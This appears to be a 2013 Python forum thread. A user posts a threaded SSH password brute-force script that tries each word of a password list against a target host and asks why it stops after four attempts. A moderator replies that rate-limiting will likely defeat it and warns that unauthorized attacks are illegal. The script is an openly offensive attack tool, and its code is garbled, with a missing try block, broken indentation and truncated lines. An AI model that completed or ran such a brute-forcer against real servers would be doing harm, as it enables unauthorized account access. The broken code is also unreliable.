SSh Brute Force stop after testing just four lines list

A forum for general discussion of the Python programming language.

SSh Brute Force stop after testing just four lines list

Postby murfield » Tue Dec 24, 2013 7:39 pm

hi, i created an ssh brute force script that cat the /etc/passwd/shadow file and then compares it to a dictionary file.
but after testing just for lines of words in the dictionary file, it does not go any further. Please what could be wrong
with my codes. thanks

Code: Select all
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, realease):
   global Found
   global Fails
      s = pxssh.pxssh()
      s.login(host, user, password)
      print '[+] Password Found: ' + password
      Found = True
   except Exception, e:
      if 'read_nonblocking' in str(e):
         Fails += 1
         connect(host, user, password, False)
      elif 'synchronize with original prompt' in str(e):
         connect(host, user, password, False)
      if release:
def main():
   parser = optparse.OptionParser("usage "+\
         "-H <target host> -u <user> -F <password list>")
   parser.add_option('-H', dest='tgtHost', type='string', \
         help='Spacify target host')
   parser.add_option('-u', dest='user', type='string', \
         help='Spacify the user')
   parser.add_option('-F', dest='passwdFile', type='string', \
         help='Spacify password file')
   (options, args) = parser.parse_args()
   host = options.tgtHost
   passwdFile = options.passwdFile
   user = options.user
   if host == None or passwdFile == None or user == None:
      print parser.usage
   fn = open(passwdFile, 'r')
   for line in fn.readlines():
      if Found:
         print "[*] Exiting: Password Found"
      if Fails > 5:
         print "[!] Exiting: Too many Socket Timeouts"
      password = line.strip('\r').strip('\n')
      print "[-] Testing: "+str(password)
   t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()
if __name__ == '__main__':
Last edited by micseydel on Tue Dec 24, 2013 7:48 pm, edited 2 times in total.
Reason: Code tags, lock, merge of two posts, moved to general programming instead of networking.
Posts: 1
Joined: Tue Dec 24, 2013 7:30 pm

Re: SSh Brute Force stop after testing just four lines list

Postby micseydel » Tue Dec 24, 2013 7:57 pm

When I use SSH, if I input a wrong password three times then it kills the connection. It's probably too smart for this, even if you create a new connection every three failed passwords though. I don't actually know, but I wouldn't be surprised if the more passwords you try, the amount of time it makes you wait between attempts would increase exponentially. Unless the server is maintained by morons this attack will probably fail.

By the way: if you don't have permission of the owner of whatever server you're attacking to do so, you're probably violating some law. And if you live somewhere that doing this doesn't violate any laws, and someone is worth hacking into, then they'll probably just come take care of you themselves. So keep that in mind if you haven't already thought about it :)
Due to the reasons discussed here we will be moving to on October 1, 2016.

This forum will be locked down and no one will be able to post/edit/create threads, etc. here from thereafter. Please create an account at the new site to continue discussion.
User avatar
Posts: 2994
Joined: Tue Feb 12, 2013 2:18 am
Location: Mountain View, CA

Return to General Discussions

Who is online

Users browsing this forum: Yoriz and 3 guests